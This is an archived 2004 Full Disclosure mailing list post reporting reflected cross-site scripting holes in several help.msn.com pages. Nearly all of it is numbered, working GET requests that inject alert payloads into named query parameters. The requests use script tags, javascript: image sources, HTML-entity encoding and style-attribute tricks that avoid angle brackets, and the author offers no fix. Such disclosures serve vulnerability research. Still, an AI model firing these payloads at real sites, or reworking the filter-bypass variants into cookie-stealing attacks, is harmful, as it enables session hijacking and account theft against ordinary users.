Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

help.msn.com
From: jamie fisher <contact_jamie_fisher () yahoo co uk>
Date: Tue, 7 Dec 2004 10:46:29 +0000 (GMT)

This is gonna be quick'n'dirty.  My dinner is almost cooked...
 
More XSS for MSN to add to the list:
 
1. Cross site scripting (In JavaScript context)
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills 
Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills 
Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills 
Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills 
Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.5 GET 
/en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills
 Momma%27)%2B%27 HTTP/1.0
 
2 Cross site scripting (Standard variants)
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
2.1 GET 
/EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills
 
Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
2.2 GET 
/EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills
 
Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills 
Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail
 HTTP/1.0
 
2.4 GET 
/EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail
 HTTP/1.0
 
3 Cross site scripting (Standard variants)
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills 
Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills 
Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
4 Cross site scripting using HTML entities
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
4.1 GET 
/EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
4.2 GET 
/EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail
 HTTP/1.0
 
5 Cross site scripting using HTML entities
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
5.1 GET 
/en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
6 Cross site scripting without using '<' and '>' symbols
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
6.1 GET 
/EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
6.2 GET 
/EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail
 HTTP/1.0
 
7 Cross site scripting without using '<' and '>' symbols
 
http://help.msn.com/en_au/directedhelp.asp
 
7.1 GET 
/en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
7.2 GET 
/en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
7.3 GET 
/en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail
 HTTP/1.0
 
7.4 GET 
/en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22
 HTTP/1.0
 
I won't say how to fix.  The last time I ran XSS by a website (Kevin Mitnicks), some nematode 
<">http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix.  Bearing in mind the triviality of XSS I really 
shouldn't have bothered; but I did.
 
<!--# Greets:
 Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my 
keypad, and all the lads on the contract where I am currently -->
 
 
 


---------------------------------
Moving house? Beach bar in Thailand? New Wardrobe? Win £10k with Yahoo! Mail to make your dream a reality.

                
---------------------------------
Win a castle  for NYE with your mates and Yahoo! Messenger 

  By Date           By Thread  

Current thread:
  • help.msn.com jamie fisher (Dec 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]